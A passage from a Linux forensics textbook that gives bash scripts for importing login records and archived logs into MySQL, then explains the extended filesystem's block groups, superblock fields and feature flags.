Not surprisingly, we can create a script that will import the logins and failed login attempts into our database. Because these files tend to be smaller than some other logs and they can contain valuable information, the script presented here loads not only the current files but also any archives. A few new techniques can be found in the script that follows.

#!/bin/bash
#
# get-logins.sh
#
# Simple script to get all successful and unsuccessful
# login attempts and optionally store them in a database.
#
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
   echo "usage: $0 <mount point of root> [database name]"
   echo "Simple script to get logs of successful "
   echo "and unsuccessful logins."
   echo "Results may be optionally stored in a database"
   exit 1
}

if [[ $# -lt 1 ]] ; then
   usage
fi

# use the last and lastb commands to display information
# use awk to create ; separated fields
# use sed to strip whitespace
echo "who-what;terminal-event;start;stop;elapsedTime;ip" \
   | tee /tmp/logins.csv
for logfile in $1/var/log/wtmp*
do
   last -aiFwx -f $logfile | \
   awk '{print substr($0, 1, 8) ";" substr($0, 10, 13) ";" \
      substr($0, 23, 24) ";" substr($0, 50, 24) ";" substr($0, 75, 12) \
      ";" substr($0, 88, 15)}' \
   | sed 's/[[:space:]]*;/;/g' | sed 's/[[:space:]]+\n/\n/' \
   | tee -a /tmp/logins.csv
done

echo "who-what;terminal-event;start;stop;elapsedTime;ip" \
   | tee /tmp/login-fails.csv
for logfile in $1/var/log/btmp*
do
   lastb -aiFwx -f $logfile | \
   awk '{print substr($0, 1, 8) ";" substr($0, 10, 13) ";" \
      substr($0, 23, 24) ";" substr($0, 50, 24) ";" substr($0, 75, 12) \
      ";" substr($0, 88, 15)}' \
   | sed 's/[[:space:]]*;/;/g' | sed 's/[[:space:]]+\n/\n/' \
   | tee -a /tmp/login-fails.csv
done

if [ $# -gt 1 ] ; then
   chown mysql:mysql /tmp/logins.csv
   chown mysql:mysql /tmp/login-fails.csv
   cat << EOF | mysql $2 -u root -p
create table logins (
   who_what varchar(8),
   terminal_event varchar(13),
   start datetime,
   stop datetime,
   elapsed varchar(12),
   ip varchar(15),
   recno bigint not null auto_increment,
   primary key (recno)
);
load data infile "/tmp/logins.csv"
   into table logins
   fields terminated by ';'
   enclosed by '"'
   lines terminated by '\n'
   ignore 1 rows
   (who_what, terminal_event, @start, @stop, elapsed, ip)
   set start=str_to_date(@start, "%a %b %e %H:%i:%s %Y"),
   stop=str_to_date(@stop, "%a %b %e %H:%i:%s %Y");
create table login_fails (
   who_what varchar(8),
   terminal_event varchar(13),
   start datetime,
   stop datetime,
   elapsed varchar(12),
   ip varchar(15),
   recno bigint not null auto_increment,
   primary key (recno)
);
load data infile "/tmp/login-fails.csv"
   into table login_fails
   fields terminated by ';'
   enclosed by '"'
   lines terminated by '\n'
   ignore 1 rows
   (who_what, terminal_event, @start, @stop, elapsed, ip)
   set start=str_to_date(@start, "%a %b %e %H:%i:%s %Y"),
   stop=str_to_date(@stop, "%a %b %e %H:%i:%s %Y");
EOF
fi

This script starts out in the usual way and is quite simple right up until the line for logfile in $1/var/log/wtmp*. This is our first new item. The bash shell supports a number of variations of a for loop. Readers familiar with C and similar programming languages have seen for loops that are typically used to iterate over a list where the number of iterations is known beforehand and an integer is incremented (or decremented) with each step in the loop. Bash supports those types of loops and also allows a loop to be created that iterates over files that match a pattern.

The pattern in our for loop will match the login log file (wtmp) and any archives of the same. The do on the next line begins the code block for the loop and done seven lines later terminates it. The last command is straightforward, but the same cannot be said of the series of pipes that follow. As usual, it is easier to understand the code if you break this long command down into its subparts.

We have seen awk, including the use of positional parameters such as $0 and $1, in previous scripts. The substr function is new, however. The format for substr is substr(<some string>, <starting index>, <max length>). For example, substr("Hello there", 1, 4) would return "Hell". Notice that indexes are 1-based, not 0-based as in many other languages and programs. Once you understand how substr works, it isn't difficult to see that this somewhat long awk command is printing six fields of output from last separated by semicolons. In order, these fields are: who or what the entry refers to, the terminal or event for the entry, start time, stop time, elapsed time, and IP address.
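Since Python slices are 0-based, a quick translation helps show what awk's substr is doing. This is a sketch only: substr and split_fixed are hypothetical helpers, the column list is invented for the demonstration, and the awk behavior for start indexes below 1 is deliberately not modeled.

```python
def substr(s, start, length):
    """awk-style substr for start >= 1: 1-based start index, at most `length` characters."""
    begin = start - 1  # convert the 1-based awk index to a 0-based Python index
    return s[begin:begin + length]


def split_fixed(line, columns):
    """Cut fixed-width columns out of a line and join them with semicolons."""
    return ";".join(substr(line, start, length) for start, length in columns)


print(substr("Hello there", 1, 4))              # Hell
print(split_fixed("abcdefgh", [(1, 3), (5, 2)]))  # abc;ef
```

The awk command in the script does the same thing with six (start, length) pairs chosen to match the column layout of the last output.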

There is still a small problem with the formatted output from last. Namely, there is likely a bunch of whitespace in each entry before the semicolons. This is where sed, the stream editor, comes in. One of the most popular commands in sed is the substitution command which has a general format of s/<search pattern>/<replacement pattern>/<options>. While "/" is the traditional separator used, the user may use a different character ("#" is a common choice) if desired. The translation of sed 's/[[:space:]]*;/;/g' is search for zero or more whitespace characters before a semicolon, if you find them substitute just a semicolon, and do this globally (g option) which in this context means do not stop with the first match on each line. The second sed command, sed 's/[[:space:]]+\n/\n/', is meant to remove whitespace from the end of each line (the IP field). Because sed normally processes one line at a time with the trailing newline removed, a pattern anchored with $, such as s/[[:space:]]*$//, is a more reliable way to achieve this. The code for processing btmp (failed logins) parallels the wtmp code.
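The two cleanup steps are easy to try out in Python with the re module, which may help if sed syntax is unfamiliar. In this sketch the function names and the sample line are hypothetical, and Python's \s is used as a close stand-in for the POSIX [[:space:]] class.

```python
import re


def strip_before_semicolons(line):
    """Counterpart of sed 's/[[:space:]]*;/;/g': drop whitespace before every semicolon."""
    return re.sub(r"\s*;", ";", line)


def strip_trailing(line):
    """Remove whitespace at the end of the line (the padded last field)."""
    return re.sub(r"\s+$", "", line)


# Hypothetical padded output line.
raw = "john    ;pts/0        ;192.168.56.1   "
print(strip_trailing(strip_before_semicolons(raw)))
```

re.sub replaces every match by default, which corresponds to the g option on the sed substitution.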

The database code is similar to what we have used before. Once again, the only small complication is formatting the date and time information output by last and lastb into a MySQL datetime object. Some of the output from running this script against the PFE subject system is shown in Figure 6.25. Note that last and lastb generate an empty line and a message stating when the log file was created. This results in bogus entries in your database. My philosophy is that it is better to ignore these entries than to add considerable complication to the script to prevent their creation.
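The same timestamp conversion can be checked outside MySQL. The sketch here uses Python's datetime.strptime with a format that I believe corresponds to the str_to_date format in the script; note that the directive letters differ between the two (MySQL's %e, %i, and %s versus Python's %d, %M, and %S). The function name parse_last_timestamp and the sample string are my own, and the month and weekday abbreviations are assumed to be in English.

```python
from datetime import datetime


def parse_last_timestamp(text):
    """Parse a 'Mon Mar  9 21:33:55 2015' style timestamp as printed by last -F."""
    return datetime.strptime(text.strip(), "%a %b %d %H:%M:%S %Y")


print(parse_last_timestamp("Mon Mar  9 21:33:55 2015"))
```

Lines that are not timestamps, such as the message stating when the log file was created, raise ValueError here, which is the Python counterpart of the bogus entries mentioned above.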

FIGURE 6.25

Output from running logins and failed login attempts script. Note that there are a couple of empty entries and erroneous lines that follow.

The query select * from logins order by start; will list login sessions and select * from login_fails order by start; will display failed login attempts. Some of the results from these queries are shown in Figure 6.26. In the figure it can be seen that the attacker failed to log in remotely from IP address 192.168.56.1 as lightdm on 2015-03-09 21:33:55. Around that same time the john, johnn, and lightdm accounts had successful logins from the same IP address. The attacker appears to be testing some newly created accounts.

FIGURE 6.26

Login sessions and failed login attempts.

OPTIONAL - GETTING ALL THE LOGS

Earlier in this chapter we discussed importing the current log files into MySQL. We ignored the archived logs to save space and also because they may be uninteresting. For those that wish to grab everything, I offer the following script.

#!/bin/bash
#
# get-logfiles-ext.sh
#
# Simple script to get all logs and optionally
# store them in a database.
# Warning: This script might take a long time to run!
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
#
# This is an extended version of get-logfiles.sh.
# It will attempt to load current logs and archived logs.
# This could take a long time and require lots of storage.

usage () {
   echo "usage: $0 <mount point of root> [database name]"
   echo "Simple script to get log files and"
   echo "optionally store them to a database."
   exit 1
}

if [ $# -lt 1 ] ; then
   usage
fi

# remove old file if it exists
if [ -f /tmp/logfiles.csv ] ; then
   rm /tmp/logfiles.csv
fi

olddir=$(pwd)
cd "$1/var"
for logfile in $(find log -type f -name '*')
do
   # compressed archives are expanded with zcat before awk sees them
   if echo $logfile | egrep -q '\.gz$' ; then
      zcat $logfile | awk "{ print \"$logfile;\" \$0 }" \
         | tee -a /tmp/logfiles.csv
   else
      awk "{ print \"$logfile;\" \$0 }" $logfile \
         | tee -a /tmp/logfiles.csv
   fi
done
cd "$olddir"

if [ $# -gt 1 ] ; then
   chown mysql:mysql /tmp/logfiles.csv
   clear
   echo "Let's put that in the database"
   cat << EOF | mysql $2 -u root -p
create table if not exists logs (
   logFilename varchar(2048) not null,
   logentry varchar(2048) not null,
   recno bigint not null auto_increment,
   primary key (recno)
);
load data infile "/tmp/logfiles.csv"
   into table logs
   fields terminated by ';'
   enclosed by '"'
   lines terminated by '\n';
EOF
fi

If you decide to go this route you will want to modify your queries slightly. In particular, you will want to add "order by logFilename desc, recno" to your select statement in order to present things in chronological order. For example, to query all logs you would use select * from logs order by logfilename desc, recno. To examine a particular log file use select logfilename, logentry from logs where logfilename like '%<base log filename>%' order by logfilename desc, recno, e.g. select logfilename, logentry from logs where logfilename like '%syslog%' order by logfilename desc, recno.
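Sorting on the filename in descending order works because "syslog.3.gz" compares greater than "syslog.1", which in turn compares greater than "syslog". Be aware that this is a plain string comparison, so a log kept for ten or more rotations (syslog.10.gz) would sort out of place. The Python sketch here shows one way to order names by their numeric rotation instead; rotation_key and oldest_first are hypothetical helpers, and the naming pattern is assumed to be <base log file>.n with an optional .gz suffix.

```python
import re


def rotation_key(name):
    """Return (base name, rotation number); the current log counts as rotation 0."""
    match = re.match(r"^(.*?)\.(\d+)(\.gz)?$", name)
    if match:
        return (match.group(1), int(match.group(2)))
    return (name, 0)


def oldest_first(names):
    """Sort by base name, then by rotation number with the highest (oldest) first."""
    return sorted(names, key=lambda n: (rotation_key(n)[0], -rotation_key(n)[1]))


print(oldest_first(["syslog", "syslog.10.gz", "syslog.2.gz", "syslog.1"]))
```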

SUMMARY

In this chapter we have learned to extract information from a mounted subject filesystem or filesystems. Many techniques were presented for analyzing this data in LibreOffice and/or a database such as MySQL. In the next chapter we will dig into Linux extended filesystems which will allow us, among other things, to detect data that has been altered by an attacker.

CHAPTER 7

Extended Filesystems

INFORMATION IN THIS CHAPTER:

Organization of extended filesystems
Superblocks
Compatible, incompatible, and read-only features
Group descriptors
Inodes
New features in ext4
Using Python to read filesystem structures
Using shell scripting to find out of place files
Detecting alteration of metadata by an attacker

EXTENDED FILESYSTEM BASICS

Running Linux allows you to have lots of choices. This includes your choice of filesystems. That said, some version of the Linux extended filesystem is found on the vast majority of Linux systems. These are commonly referred to as extN filesystems, where N is the version in use (normally 2, 3, or 4). The ext2 filesystem is popular for partitions that don't change often such as boot partitions. Most Linux distributions use ext4 by default on general use filesystems such as /, /home, /usr, /opt, etc.

A natural question to ask is what is the extended filesystem extended from? The answer is the Unix File System (UFS). While the extN family is an extension of UFS, it is also a simplification. Some of the features in UFS were no longer relevant to modern media, so they were removed to simplify the code and improve performance. The extN family is meant to be robust with good performance.

There is a reason that ext2 is normally reserved for static filesystems. Both ext3 and ext4 are journaling filesystems, but ext2 is a non-journaling filesystem. What's a journal? In this context it isn't a chronicling of someone's life occurrences. Rather journaling is used to both improve performance and reduce the chances of data corruption.

Here is how a journaling filesystem works. Writes to the media are not done immediately, rather the requested changes are written to a journal. You can think of these updates like transactions in a database. When a command returns it means that either the entire transaction was completed (all of the data was written or updated) in which case it returns success or the filesystem was returned to its previous state if the command could not be completed successfully. In the event that the computer was not shut down cleanly, the journal can be used to return things to a consistent state. Having a journaling filesystem significantly speeds up the filesystem check (fsck) process.

Extended filesystems store information in blocks which are organized into block groups. The blocks are normally 1024, 2048, or 4096 bytes in size. Most media you are likely to encounter use 512 byte sectors. As a result, blocks are 2, 4, or 8 sectors long. For readers familiar with the FAT and NTFS filesystems, a block in Unix or Linux is roughly equivalent to a cluster in DOS or Windows. The block is the smallest allocation unit for disk space.

A generic picture of the block groups is shown in Figure 7.1. Keep in mind that not every element shown will be present in each block group. We will see later in this chapter that the ext4 filesystem is highly customizable. Some elements may be moved or eliminated from certain groups to improve performance.

We will describe each of the elements in Figure 7.1 in detail later in this chapter. For now, I will provide some basic definitions of these items. The boot block is just what it sounds like, boot code for the operating system. This might be unused on a modern system, but it is still required to be there for backward compatibility. A superblock describes the filesystem and tells the operating system where to find various elements (inodes, etc.). Group descriptors describe the layout of each block group. Inodes (short for index nodes) contain all the metadata for a file except for its name. Data blocks are used to store files and directories. The bitmaps indicate which inodes and data blocks are in use.

FIGURE 7.1

Generic block group structure. Note that some components may be omitted from a block group depending on the filesystem version and features.

The extended filesystem allows for optional features. The features fall into three categories: compatible, incompatible, and read-only compatible. If an operating system does not support a compatible feature, the filesystem can still be safely mounted. Conversely, if an operating system lacks support for an incompatible feature, the filesystem should not be mounted. When an operating system doesn't provide a feature on the read-only compatible list, it is still safe to mount the filesystem, but only if it is attached as read-only. Something to keep in mind if you ever find yourself examining a suspected attacker's computer is that he or she might be using non-standard extended features.
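The three feature categories amount to a simple decision rule, sketched here in Python. This is my own illustration of the rule as stated above, not kernel code: the function name mount_decision is hypothetical and the bit values in the examples are arbitrary rather than real ext4 feature flags.

```python
def mount_decision(incompat, ro_compat, supported_incompat, supported_ro_compat):
    """Return 'read-write', 'read-only', or 'refuse' for a filesystem's feature bitmasks.

    Each argument is an integer bitmask. Compatible features never block a mount,
    so they do not need to be passed in at all.
    """
    if incompat & ~supported_incompat:
        return "refuse"       # unknown incompatible feature: do not mount
    if ro_compat & ~supported_ro_compat:
        return "read-only"    # unknown read-only compatible feature
    return "read-write"


# Arbitrary example masks, not real feature flag values.
print(mount_decision(0b01, 0b00, 0b01, 0b00))  # read-write
print(mount_decision(0b10, 0b00, 0b01, 0b00))  # refuse
print(mount_decision(0b01, 0b10, 0b01, 0b01))  # read-only
```

For forensic work you will be mounting read-only in any case, but an unsupported incompatible feature is a sign that your tools may misread the filesystem.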

The Sleuth Kit (TSK) by Brian Carrier is a set of tools for filesystem analysis. One of these tools, fsstat, allows you to collect filesystem (fs) statistics (stat). By way of warning, this tool appears to be somewhat out of date and may not display all of the features of your latest version ext4 filesystem correctly. Don’t worry, we will develop some up-to-date scripts later in this chapter that will properly handle the latest versions of ext4 as of this writing (plus you will have Python code that you could update yourself if required).

In order to use fsstat you must first know the offset to the filesystem inside your image file. Recall that we learned in Chapter 5 that the fdisk tool could be used to determine this offset. The syntax for this command is simply fdisk <image file>. As we can see in Figure 7.2, the filesystem in our PFE subject image begins at sector 2048.

FIGURE 7.2

Using fdisk to determine the offset to the start of a filesystem.

Once the offset is determined, the command to display filesystem statistics is just fsstat -o <offset> <image file>, e.g., fsstat -o 2048 pfe1.img. Partial results from running this command against our PFE subject image are shown in Figure 7.3 and Figure 7.4. The results in Figure 7.3 reveal that we have a properly unmounted ext4 filesystem that was last mounted at / with 1,048,577 inodes and 4,194,048 4 kB blocks. Compatible, incompatible, and read-only compatible features are also shown in this screenshot. From Figure 7.4 we can see there are 128 block groups with 8,192 inodes and 32,768 blocks per group. We also see statistics for the first two block groups.
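The numbers reported by fdisk and fsstat can be cross-checked with a little arithmetic. The short sketch below assumes 512-byte sectors (an assumption, although it is the usual case); the other values are the ones quoted above.

```python
SECTOR_SIZE = 512          # assumption: 512-byte sectors
start_sector = 2048        # filesystem start, from fdisk
total_blocks = 4194048     # block count reported by fsstat
blocks_per_group = 32768   # blocks per group reported by fsstat

# Byte offset of the filesystem inside the image file.
byte_offset = start_sector * SECTOR_SIZE

# The last group may be only partially filled, so round up.
block_groups = (total_blocks + blocks_per_group - 1) // blocks_per_group

print("byte offset: %d" % byte_offset)     # 1048576
print("block groups: %d" % block_groups)   # 128
```

The computed group count agrees with the 128 block groups shown by fsstat.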

FIGURE 7.3

Result of running fsstat – part 1.

FIGURE 7.4

Results of running fsstat – part 2.

SUPERBLOCKS

Now that we have a high level view of the extended filesystem, we will drill down into each of its major components, starting with the superblock. The superblock is 1024 bytes long and begins 1024 bytes (2 sectors) into the partition right after the boot block. By default the superblock is repeated in the first block of each block group, but this can be changed by enabling various filesystem features.
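Locating the primary superblock in an image file follows directly from this description. The sketch below is a minimal illustration, assuming 512-byte sectors; the function name is hypothetical, and the magic value 0xEF53 at offset 0x38 is the superblock signature.

```python
import struct

SECTOR_SIZE = 512          # assumption: 512-byte sectors
SUPERBLOCK_OFFSET = 1024   # superblock begins 1024 bytes into the partition
SUPERBLOCK_SIZE = 1024
EXT_MAGIC = 0xEF53         # signature stored at offset 0x38

def read_superblock(image_path, start_sector):
    """Return the raw 1024-byte superblock or raise ValueError."""
    with open(image_path, 'rb') as f:
        f.seek(start_sector * SECTOR_SIZE + SUPERBLOCK_OFFSET)
        data = f.read(SUPERBLOCK_SIZE)
    if len(data) != SUPERBLOCK_SIZE:
        raise ValueError('image too short to hold a superblock')
    # The magic number is a little-endian 16-bit value.
    magic = struct.unpack_from('<H', data, 0x38)[0]
    if magic != EXT_MAGIC:
        raise ValueError('bad magic 0x%04X' % magic)
    return data
```

Checking the signature first is a cheap way to catch a wrong partition offset before any other field is interpreted.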

Some readers may be familiar with the BIOS parameter blocks and extended BIOS parameter blocks in FAT and NTFS boot sectors. On Windows systems the parameters in those blocks contain all the information the operating system requires in order to read files from the disk. The superblock performs a similar function for Linux systems. Information contained in the superblock includes:

Block size
Total blocks
Number of blocks per block group
Reserved blocks before the first block group
Total number of inodes
Number of inodes per block group
The volume name
Last write time for the volume
Last mount time for the volume
Path where the filesystem was last mounted
Filesystem status (whether or not cleanly unmounted)

When examining a filesystem it can be convenient to use a hex editor that is made specifically for this purpose. One such editor is Active@ Disk Editor by Lsoft. It is freely available and there is a version for Linux (as well as one for Windows). The Active@ Disk Editor (ADE) may be downloaded from http://disk-editor.org. ADE has several nice features, including templates for interpreting common filesystem structures such as superblocks and inodes. The subject system’s superblock is shown in ADE in Figure 7.5. We will cover the fields in Figure 7.5 in detail later in this chapter during our discussion of various filesystem features. For the moment, I feel I should point out that the block size (offset 0x18 in the superblock) is stored as x, where the block size in bytes = 2^(10 + x) = 1024 * 2^x. For example, the stored block size of 2 equates to a 4 kB (4096 byte) block. Table 7.1 summarizes all of the fields that may be present in a superblock as of this writing. The material in Table 7.1 primarily comes from the header file /usr/src/<linux version>/fs/ext4/ext4.h.
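The block size rule is easy to get wrong in code, so a short worked example may help. The function name below is hypothetical.

```python
def block_size_from_log(log_block_size):
    """Convert the value stored at offset 0x18 into a block size in bytes."""
    # 2 ** (10 + x) is the same as shifting 1024 left by x bits.
    # Note that ^ is bitwise XOR in Python, not exponentiation.
    return 1024 << log_block_size

for x in range(0, 4):
    print("stored %d -> %d bytes" % (x, block_size_from_log(x)))
```

A stored value of 2 yields 4096 bytes, matching the 4 kB blocks of the subject image.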

FIGURE 7.5

Examining a superblock with Active@ Disk Editor.

Table 7.1. Superblock field summary.

Offset  Size  Name                  Description
0x0     4     inodecount            Total inode count.
0x4     4     blockcountlo          Total block count.
0x8     4     rblockcountlo         This number of blocks can only be allocated by the super-user.
0xC     4     freeblockcountlo      Free block count.
0x10    4     freeinodecount        Free inode count.
0x14    4     firstdatablock        First data block.
0x18    4     logblocksize          Block size is 2^(10 + logblocksize).
0x1C    4     logclustersize        Cluster size is 2^logclustersize.
0x20    4     blockpergroup         Blocks per group.
0x24    4     clusterpergroup       Clusters per group, if bigalloc is enabled.
0x28    4     inodepergroup         Inodes per group.
0x2C    4     mtime                 Mount time, in seconds since the epoch.
0x30    4     wtime                 Write time, in seconds since the epoch.
0x34    2     mntcount              Number of mounts since the last fsck.
0x36    2     maxmntcount           Number of mounts beyond which a fsck is needed.
0x38    2     magic                 Magic signature, 0xEF53.
0x3A    2     state                 Filesystem state.
0x3C    2     errors                Behavior when detecting errors.
0x3E    2     minorrevlevel         Minor revision level.
0x40    4     lastcheck             Time of last check, in seconds since the epoch.
0x44    4     checkinterval         Maximum time between checks, in seconds.
0x48    4     creatoros             OS. Probably 0 = Linux.
0x4C    4     revlevel              Revision level. One of: 0 or 1.
0x50    2     defresuid             Default uid for reserved blocks.
0x52    2     defresgid             Default gid for reserved blocks.
0x54    4     firstino              First non-reserved inode.
0x58    2     inodesize             Size of inode structure, in bytes.
0x5A    2     blockgroupnr          Block group # of this superblock.
0x5C    4     featurecompat         Compatible feature set flags.
0x60    4     featureincompat       Incompatible feature set.
0x64    4     featurerocompat       Read-only compatible feature set.
0x68    byte  uuid[16]              128-bit UUID for volume.
0x78    char  volumename[16]        Volume label.
0x88    char  lastmounted[64]       Directory where filesystem was last mounted.
0xC8    4     algorithmusagebitmap  For compression (not used in e2fsprogs/Linux).
0xCC    byte  preallocblocks        Blocks to preallocate for files.
0xCD    byte  preallocdirblocks     Blocks to preallocate for directories.
0xCE    2     reservedgdtblocks     Number of reserved GDT entries.
0xD0    byte  journaluuid[16]       UUID of journal superblock.
0xE0    4     journalinum           Inode number of journal file.
0xE4    4     journaldev            Device number of journal file.
0xE8    4     lastorphan            Start of list of orphaned inodes to delete.
0xEC    4     hashseed[4]           HTREE hash seed.
0xFC    byte  defhashversion        Default hash algorithm to use for directories.
0xFD    byte  jnlbackuptype         Journal backup type.
0xFE    2     descsize              Size of group descriptors.
0x100   4     defaultmountopts      Default mount options.
0x104   4     firstmetabg           First metablock block group.
0x108   4     mkftime               When the filesystem was created.
0x10C   4     jnlblocks[17]         Backup copy of the journal inode’s iblock[].
0x150   4     blockcounthi          High 32 bits of the block count.
0x154   4     rblockcounthi         High 32 bits of the reserved block count.
0x158   4     freeblockcounthi      High 32 bits of the free block count.
0x15C   2     minextraisize         All inodes have at least # bytes.
0x15E   2     wantextraisize        New inodes should reserve # bytes.
0x160   4     flags                 Miscellaneous flags.
0x164   2     raidstride            RAID stride.
0x166   2     mmpinterval           Seconds to wait in multi-mount prevention.
0x168   8     mmpblock              Block # for multi-mount protection data.
0x170   4     raidstripewidth       RAID stripe width.
0x174   byte  loggroupperflex       Flexible block group size = 2^loggroupperflex.
0x175   byte  checksumtype          Metadata checksum algorithm type.
0x176   2     reservedpad           Alignment padding.
0x178   8     kbytewritten          KB written to this filesystem ever.
0x180   4     snapshotinum          Inode number of active snapshot.
0x184   4     snapshotid            Sequential ID of active snapshot.
0x188   8     snapshotrblockcount   Number of blocks reserved for active snapshot.
0x190   4     snapshotlist          Inode number of the head of the snapshot list.
0x194   4     errorcount            Number of errors seen.
0x198   4     firsterrortime        First time an error happened.
0x19C   4     firsterrorino         Inode involved in first error.
0x1A0   8     firsterrorblock       Number of block involved in first error.
0x1A8   byte  firsterrorfunc[32]    Name of function where the error happened.
0x1C8   4     firsterrorline        Line number where error happened.
0x1CC   4     lasterrortime         Time of most recent error.
0x1D0   4     lasterrorino          Inode involved in most recent error.
0x1D4   4     lasterrorline         Line number where most recent error happened.
0x1D8   8     lasterrorblock        Number of block involved in most recent error.
0x1E0   byte  lasterrorfunc[32]     Name of function for most recent error.
0x200   byte  mountopts[64]         ASCIIZ string of mount options.
0x240   4     usrquotainum          Inode number of user quota file.
0x244   4     grpquotainum          Inode number of group quota file.
0x248   4     overheadblocks        Overhead blocks/clusters in fs.
0x24C   4     backupbgs[2]          Block groups containing superblock backups.
0x254   byte  encryptalgos[4]       Encryption algorithms in use.
0x258   4     reserved[105]         Padding to the end of the block.
0x3FC   4     checksum              Superblock checksum.
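Several counts in Table 7.1 are split into a low and a high 32-bit half. The sketch below shows one way the two halves of the block count might be combined. The function name and the is_64bit parameter are assumptions made for illustration; the high half is only meaningful when the 64-bit feature is enabled.

```python
import struct

def total_block_count(superblock, is_64bit):
    """Combine blockcountlo (0x4) and blockcounthi (0x150)."""
    lo = struct.unpack_from('<L', superblock, 0x4)[0]
    hi = 0
    if is_64bit:
        # Only trust the high half when the 64-bit feature flag is set.
        hi = struct.unpack_from('<L', superblock, 0x150)[0]
    return (hi << 32) | lo
```

The same pattern applies to the reserved and free block counts at offsets 0x8/0x154 and 0xC/0x158.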

When using Active@ Disk Editor I recommend that you open each volume by selecting “Open in Disk Editor” as shown in Figure 7.6. This creates a new tab with a logical view of your filesystem. This logical view is more convenient than the raw physical view because, among other things, it will automatically apply some of the built-in templates. If you ever use this tool with Windows filesystems it will also translate clusters to sectors for you.

FIGURE 7.6

Opening a logical view of a volume in Active@ Disk Editor.

EXTENDED FILESYSTEM FEATURES

As previously mentioned, the extended filesystem supports a number of optional features. These are grouped into compatible, incompatible, and read-only compatible features. Details of these various types of features are presented below.

You may be wondering why a forensic examiner should care about features. This is certainly a fair question. There are a number of reasons why this is relevant to forensics. First, these features may affect the structure of block groups. Second, this in turn affects where data is located. Third, features affect how data is stored. For example, depending on the features used some data may be stored in inodes versus its usual location in data blocks. Fourth, some features might result in a new source of metadata for use in your analysis.

Compatible Features

Compatible features are essentially nice-to-haves. In other words, if you support this feature, that is great, but if not, feel free to mount a filesystem using them as readable and writable. While you may mount this filesystem, you should not run the fsck (filesystem check) utility against it as you might break things associated with these optional features. The compatible features list as of this writing is summarized in Table 7.2.

Table 7.2. Compatible Features.

Bit     Name            Description
0x1     DirPrealloc     Directory preallocation
0x2     Imagic inodes   Only the Shadow knows
0x4     HasJournal      Has a journal (Ext3 and Ext4)
0x8     ExtAttr         Supports Extended Attributes
0x10    ResizeInode     Has reserved Group Descriptor Table entries for expansion
0x20    DirIndex        Has directory indices
0x40    LazyBG          Support for uninitialized block groups (not common)
0x80    ExcludeInode    Not common
0x100   ExcludeBitmap   Not common
0x200   SparseSuper2    If set, superblock backup_bgs points to 2 BG with SB backup

The first feature in Table 7.2 is Directory Preallocation. When this feature is enabled the operating system should preallocate some space whenever a directory is created. This is done to prevent fragmentation of the directory which enhances performance. While this can be useful, it is easy to see why it is okay to mount the filesystem even if the operating system does not support this optimization.

Bit 2 (value of 0x04) is set if the filesystem has a journal. This should always be set for ext3 and ext4 filesystems. This is a compatible feature because it is (somewhat) safe to read and write a filesystem even if you are not writing through a journal to do so.

Bit 3 (value of 0x08) is set if the filesystem supports extended attributes. The first use of extended attributes was Access Control Lists (ACL). Other types of extended attributes, including user-specified, are also supported. We will learn more about extended attributes later in this chapter.

When the Resize Inode feature is in use, each block group containing group descriptors will have extra space for future expansion of the filesystem. Normally a filesystem can grow to 1024 times its current size, so this feature can result in quite a bit of empty space in the group descriptor table. As we will see later in this chapter, enabling certain features eliminates the storing of group descriptors in every block group.

Directories are normally stored in a flat format (simple list of entries) in extended filesystems. This is fine when directories are small, but can lead to sluggish performance with larger directories. When the Directory Index feature is enabled some or all directories may be indexed to speed up searches.

Normally when an extended filesystem is created, all of the block groups are initialized (set to zeros). When the Lazy Block Group feature is enabled, a filesystem can be created without properly initializing the metadata in the block groups. This feature is uncommon, as are the Exclude Inode and Exclude Bitmap features.

In a generic extended filesystem the superblock is backed up in every single block group. There are a number of features that can be used to change this behavior. Modern media are considerably more reliable than their predecessors. As a result, it makes little sense to waste disk space with hundreds of superblock backups. When the Sparse Super 2 feature is enabled the only superblock backups are in two block groups listed in an array in the superblock.

Now that we have learned about all the compatible features, we might ask which features affect the layout of our data. The two features in this category that affect the filesystem layout are Resize Inode and Sparse Super 2 which add reserved space in group descriptor tables and cause backup superblocks to be removed from all but two block groups, respectively.
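A feature bitmask such as the compatible set can be decoded with a simple lookup table. The following is a minimal sketch using the bit values from Table 7.2; the function and table names are hypothetical, and reporting leftover bits as "Unknown" is a design choice made for this example.

```python
# Bit values and names taken from Table 7.2.
COMPAT_FEATURES = [
    (0x1, 'DirPrealloc'), (0x2, 'ImagicInodes'), (0x4, 'HasJournal'),
    (0x8, 'ExtAttr'), (0x10, 'ResizeInode'), (0x20, 'DirIndex'),
    (0x40, 'LazyBG'), (0x80, 'ExcludeInode'), (0x100, 'ExcludeBitmap'),
    (0x200, 'SparseSuper2'),
]

def decode_features(mask, table):
    """Return the names of all bits set in mask, in table order."""
    names = [name for bit, name in table if mask & bit]
    # Report any bits the table does not know about instead of hiding them.
    known = sum(bit for bit, _ in table)
    unknown = mask & ~known
    if unknown:
        names.append('Unknown(0x%X)' % unknown)
    return names

print(decode_features(0x3C, COMPAT_FEATURES))
```

Surfacing unknown bits matters in forensics, because an unrecognized flag may indicate a newer or non-standard feature that the examiner's tools do not handle.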

How can you get enabled features and other information from a live Linux extended filesystem? Not surprisingly there are a number of tools available. The first tool is the stat (statistics) command which is normally used on files, but may also be used on filesystems. The syntax for running this command on a normal file is stat <filename>, e.g., stat *.mp3. The results of running stat on some MP3 files are shown in Figure 7.7. To run stat on a filesystem the command is stat -f <mount point>, e.g., stat -f /. The output from stat -f / run on my laptop is shown in Figure 7.8. Note that the filesystem ID, type, block size, total/free/available blocks, and total/free inodes are displayed.
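Much of the information reported by stat -f is also available from Python on a live Unix-like system through os.statvfs. The sketch below is only an illustration; the function name and the dictionary keys are assumptions chosen for readability.

```python
import os

def filesystem_summary(mount_point):
    """Collect block and inode counts for a mounted filesystem."""
    st = os.statvfs(mount_point)
    return {
        'block_size': st.f_bsize,
        'total_blocks': st.f_blocks,
        'free_blocks': st.f_bfree,
        'available_blocks': st.f_bavail,   # free blocks for non-root users
        'total_inodes': st.f_files,
        'free_inodes': st.f_ffree,
    }

summary = filesystem_summary('/')
for key in sorted(summary):
    print("%s: %d" % (key, summary[key]))
```

Like stat -f, this only works against a mounted filesystem, so it is useful for live response rather than for image analysis.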

FIGURE 7.7

Running the stat command on regular files.

FIGURE 7.8

Running the stat command on a filesystem.

